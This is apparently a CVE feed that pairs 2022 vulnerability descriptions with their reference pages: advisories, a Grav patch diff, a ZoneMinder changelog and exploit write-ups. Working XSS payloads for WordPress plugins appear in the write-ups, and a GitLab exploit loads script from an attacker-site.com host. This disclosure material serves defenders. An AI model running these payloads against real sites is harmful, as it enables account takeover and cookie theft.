Unauthenticated Cross-Site Scripting (XSS) vulnerability in Tripetto's Tripetto plugin <= 5.1.4 on WordPress via SVG image upload.

CVE-2021-36895: WordPress form builder plugin for contact forms, surveys and quizzes – Tripetto

An issue was discovered in CipherMail Webmail Messenger 1.1.1 through 4.1.4. A local attacker could access secret keys (found in a Roundcube configuration file) that are used to protect Webmail user passwords and two-factor authentication (2FA).

CVE-2022-28218: Webmail Messenger release notes - CipherMail Email Encryption

stored xss in GitHub repository getgrav/grav prior to 1.7.33.

@@ -219,7 +219,8 @@ public static function detectXss($string, array $options = null): ?string $string = html\_entity\_decode($string, ENT\_NOQUOTES | ENT\_HTML5, 'UTF-8');  
// Strip whitespace characters $string = preg\_replace('!\\s!u', '', $string); $string = preg\_replace('!\\s!u', ' ', $string); $stripped = preg\_replace('!\\s!u', '', $string);  
// Set the patterns we'll test against $patterns = \[ @@ -242,7 +243,7 @@ public static function detectXss($string, array $options = null): ?string // Iterate over rules and return label if fail foreach ($patterns as $name => $regex) { if (!empty($enabled\_rules\[$name\])) { if (preg\_match($regex, $string) || preg\_match($regex, $orig)) { if (preg\_match($regex, $string) || preg\_match($regex, $stripped) || preg\_match($regex, $orig)) { return $name; } }

CVE-2022-1173: Fixed XSS check not detecting onX events without quotes · getgrav/grav@1c0ed43

WordPress Coru LFMember plugin version 1.0.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Coru LFMember - Stored Cross SiteScripting# Date: 26-04-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/Coru LFMember/# Version: 1.0.2# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# Vulnerable Code:```<td class="manage-column"><input type="text" value="<?php print$result['game_image'] ?>" name="game_image[]" /></td><td class="manage-column"><?php printstripslashes($result['game_name_short']) ?></td><td class="manage-column"><input type="text" value="<?php printstripslashes($result['game_name_long']) ?>" name="game_name_long[]" /></td><td class="manage-column"><textarea name="game_description[]" rows="4"cols="10"><?php print stripslashes($result['game_description'])?></textarea></td><td class="manage-column"><input type="text" value="<?php print$result['game_link'] ?>" name="game_link[]" /></td>```# POC1. Install the Coru LFMember WordPress plugin and activate it.2. Go to LFMember -> Add New and inject XSS payload “><img src=xonerror=alert(1)> in the fields given i.e, Game Image Name, Game ShortName, Game Long Name, Game Description, and Links to.3. XSS will trigger and will be stored.## POC Imagehttps://imgur.com/kZDtIVz

WordPress Coru LFMember 1.0.2 Cross Site Scripting

Gitlab versions 14.9 prior to 14.9.2, 14.8 prior to 14.8.5, and 14.7 prior to 14.7.7 suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: Gitlab Stored XSS# Date: 12/04/2022# Exploit Authors: Greenwolf & stacksmashing# Vendor Homepage: https://about.gitlab.com/# Software Link: https://about.gitlab.com/install# Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2# Tested on: Linux# CVE : CVE-2022-1175# References: https://github.com/Greenwolf/CVE-2022-1175Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor.Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>Standard script include also works depending on the sites CSP policy. This is more stealthy.<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>

Gitlab 14.9 Cross Site Scripting

WordPress WP-Invoice plugin version 4.3.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin  WP-Invoice - Stored Cross Site Scripting# Date: 25-04-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/WP-Invoice/# Version: 4.3.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# Vulnerable Code:``` wpi.business_name = '<?php echo ($wpi_settings['business_name']); ?>';``# POC1.  Install the WP-Invoice WordPress plugin and activate it.2. Go to WP-Invoice settings  and inside the Business Name field inject XSSpayload “><img src=x onerror=alert(1)>3. XSS will trigger and will be stored.## POC Imagehttps://imgur.com/rsHIEO9

WordPress WP-Invoice 4.3.1 Cross Site Scripting

ZoneMinder before 1.36.13 allows remote code execution via an invalid language.

**Changes since 1.36.12**

*   Change a warning to a Debug when getting the latest image using zmu
*   Updates to Axis PTZ script adding support for getting details from Path and fixing support for older cameras
*   Fix for update script for 1.35.25 and DayEventDiskSpace
*   include user and function error message about insufficient permissions. Will make it easier to figure out who tried what.
*   Fix for crash in CSRF
*   Fix missing text-right align on Port/Path labels. Set step to 1 for Port
*   Remote RTSP camera.
*   Fix fail to get Sources in Remote RTSP
*   Fix compilation with ffmpeg 5.0
*   Implement filter limits. Which go before pagination/advanced search limits
*   Fix do\_debian\_package build script for version = CURRENT style versioning.
*   Implement a check on change of language. Make sure that the specified language file exists. Reports errors to UI
*   Test for valid language file when saving user.
*   add styling for errors reported to ui and include the errors on options view
*   Fix zmu device probing
*   Change title of v4l settings button to give an indication WHY it isn't enabled
*   Convert Fatal()s to Errors() in image viewing. Maybe Fixes \[#3426\]
*   Include EndDateTimeShort in event stats
*   Handle empty endtime (in progress event) more gracefully. If there is a next event just jump to it.
*   locking fixes that caused hung zmu and zms processes
*   Set mysql character set to utf8 explicitly to support chinese characters (or other special characters).
*   escape html in Storage names
*   fix auth'd user information being saved to session before switching session id's leaving bogus authenticated user in previous session.
*   Fix potential XSS from Username
*   Add a pattern filter for Usernames, Group Names and Storage Names to prevent invalid characters and XSS
*   Add NOT IN case to filters. Also, fix bad SQL when value evals to false. Test for empty string instead. Fixes \[#3425\]
*   Fix CURL monitors
*   Fix event view corruption caused by changes to the sendfile system call.Fixes \[#3437\]
*   Add useful title to frame image telling us which we are looking at
*   Allow empty sort field when listing events
*   Fix error in PTZ control code when no speed has been defined.
*   Allow editing of admin user.
*   Add more of the resulting SQL to the filter debug modal
*   Make filter debug modal work on non-saved filter
*   improvements to Event module implementing a Server() function which figures out which Server likely has the video. Use it to remove duplicate logic
*   improvements to Zone module Add numCoords, Coords, Area, AlarmRGB to Zone object. Also add Points(), AreaCoords, svg\_polygon
*   Implement zm\_setcookie to simplify setting cookies, set samesite, deal with older php etc
*   add loading=lazy to most images to improve page loading
*   Don't both running zmu if monitor Function is set to None
*   Add mp4 as an option for generated video and make it the default instead of avi
*   Set some new more sensible defaults for various settings including logging, navbar refreshes, full page refreshes and ajax timeouts
*   Big update to Control.pm
*   Fix for Netcat PTZ using x=0 y=0 for autostop in addition to old stop movement code
*   Implement reboot and ping methods for Trendnet PTZ Control
*   rough in Url, UrlToZMS PathToZMS PathToIndex, UrlToIndex UrlToApi PathToApi in SERver object
*   reduce debug logging in zmaudit

There are fixes in here for 3 vulnerabilities:  
Remote code execution by specifying an invalid language found by Krastanoel.  
Stored XSS in Username field found by Tester Tester  
Session Fixation problem found by Tester Tester.

**Full Changelog**: 1.36.12...1.36.13

CVE-2022-29806: Release The Memory Remains 1.36.13 · ZoneMinder/zoneminder

Plugin Settings Update vulnerability in ShortPixel's ShortPixel Adaptive Images plugin <= 3.3.1 at WordPress allows an attacker with a low user role like a subscriber or higher to change the plugin settings.

CVE-2022-29417: ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization

Authenticated (admin user role) Persistent Cross-Site Scripting (XSS) in Mark Daniels Night Mode plugin <= 1.0.0 on WordPress via vulnerable parameters: &ntmode_page_setting[enable-me], &ntmode_page_setting[bg-color], &ntmode_page_setting[txt-color], &ntmode_page_setting[anc_color].

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Night Mode is the WordPress plugin which is made to work you with ease in Night , Causing Relaxation in your eyes and you don’t have to face itching white dashboard screen

Major features in Night Mode include:

*   Can work in night without much difficulty
*   Can turn on and off the night shift mode
*   Can Easily Manage the color selection based on usage
*   Free to use

Contact Developer info@kbizsoft.com

Powered By Kbizsoft

Upload the Night Mode plugin to your blog, Activate it, then under setting > Night Mode you can manage it

1, 2, 3: You’re done!

**Is it Working with WordPress Admin Dashboard?**

Yes, it is used to change the WordPress admin dashboard to night mode. So you can work at night as long as you want. Because of the comfort in your eyes and you won’t have to face itching on the white dashboard screen

**Is it used for front-end users?**

Not now, we will update it in the next update of the plugin.

![](https://secure.gravatar.com/avatar/36168835e4cb82af41bcc3efe31bf572?s=60&d=retro&r=g)

Please change the name, you are misleading people. This is serious security issue. Your plugin can contain some virus (malware, adware, trojan) or at least you can get some private data from users

![](https://secure.gravatar.com/avatar/000d429f5d5f14dd898b25b5bdd00fbf?s=60&d=retro&r=g)

Really Liked the Concept and the functionality of the plugin

![](https://secure.gravatar.com/avatar/54e63491a98ec1a2a88285790f8b86a3?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/698001382bb9faba1224dacb75335d3f?s=60&d=retro&r=g)

Thanks for the excellent plugin with Night Mode functionality. Could it make that according to browser time, the Plugin is activated automatically?

Read all 4 reviews

“Night Mode” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/3469f6759f46c9b752fe6c133f9d04c9?s=32&d=mm&r=g) Raj

**1.4.0**

_Fixed some jQuery code issues_  
_jQuery compatibility has been updated_

**1.0.0**

_Release Date – 1st Nov 2018_

CVE-2022-29418: Night Mode

Reflective Cross-Site Scripting vulnerability in WordPress Country Selector Plugin Version 1.6.5. The XSS payload executes whenever the user tries to access the country selector page with the specified payload as a part of the HTTP request

**Description**

Reflected Cross-Site Scripting attacks are also known as non-persistent attacks which occur when a malicious script is reflected back from a web application to the victim's browser. The script is activated through a link, which sends a request to the website with a vulnerability that enables the execution of malicious scripts.

**Proof of concept: (POC)**

1.  After installing the Country Selector Plugin, go to the homepage of the WordPress site.
    
2.  Capture all the requests and find the POST request to the AJAX call of check\_country\_selector.
    

![](https://lh3.googleusercontent.com/i2i2rWMjFxYlv9_-L7PDBopBTIaX9BEqM_C8dcpq3n8BW3L49njmIEJINx3HWbtH-8knvnBFPCBTGOdYtARB1BVJZBStplzloWG6GIBg76EgOsAiar9CrO4gF34nsSaLrqf7FJt1)_**Figure 01:** Original AJAX Request_

3.  Enter the payload - <img+src=x+onerror=alert(document.cookie)> in the country parameter and <img+src=x+onerror=alert(document.cookie)> in the lang parameter.
    

![](https://lh4.googleusercontent.com/euWYbYipj3JvE9cKK23VPr_xTJXsz4ViK1jztlX34t3JpNG7opzRAF-5zARKFabNMX00J3aR19LcrPKMxz9HTGT4rsUX-TQVPBfrlN6hK2H0ganRRFE2VMoHRl5yTEU7SC2V8sFg)

_**Figure 02:** Injected XSS Payloads in “country” and “lang” Parameter_

4.  Forward the request
    
5.  Injected XSS payload will be reflected and triggered on the user’s browser.
    

![](https://lh4.googleusercontent.com/44fOb49oQJCM0udrb4BI2frmRzoYDC1EPd8M9JAjhK9jwMf57t-FkrJItda60tRoubPHn9nPRk3FBdVL9WPNRqx6bi5Okp9cnbuUbtZVh6qV_iUS-fOLf301USIrhA6O3NZxBSLk)

_**Figure 03:** Injected JavaScript Code for “lang” and “country” Parameters is Executed On The User’s Browser_

![](https://lh5.googleusercontent.com/P9rKY22N4Oh9rM_VxfjzUzcu580pzih-CuA79QrM5kM8GMSamIEg2XO0_bCJkFKp3IBjg7V7oeJKYDmKShFPwiyaZMoew8qItEIAImR217wl1HxrUPf65DhA_d1i2TA4H1xOO9Ph)

_**Figure 04:** The Default Cross-Site Scripting Mitigation Setting in wp.config file to Prevent XSS Attacks_

**Impact**

An attacker can perform the following -

*   Inject malicious code into the vulnerable variable and exploit the application through the Cross-Site Scripting vulnerability.
    
*   Modify the code and get the session information of other users.
    
*   Compromise the user machine.
    

**Remediations**

*   Perform context-sensitive encoding of entrusted input before it is echoed back to a browser using an encoding library throughout the application.
    
*   Implement input validation for special characters on all the variables that are reflected in the browser and stored in the database.
    
*   Explicitly set the character set encoding for each page generated by the webserver.
    
*   Encode dynamic output elements and filter specific characters in dynamic elements.
    

**Timeline**

**March 24, 2022:** Discovered in \`WordPress Country Selector Plugin Version 1.6.5\` Product

**March 25, 2022:** Reported to Welaunch

**March 29, 2022:** Acknowledged by Welaunch

**March 30, 2022:** Vendor Released Patch for XSS Vulnerability

**March 31, 2022****:** CSW Assigned the CVE-2022-28290

**Discovered by**

Cyber Security Works Pvt. Ltd.

Tag

#xss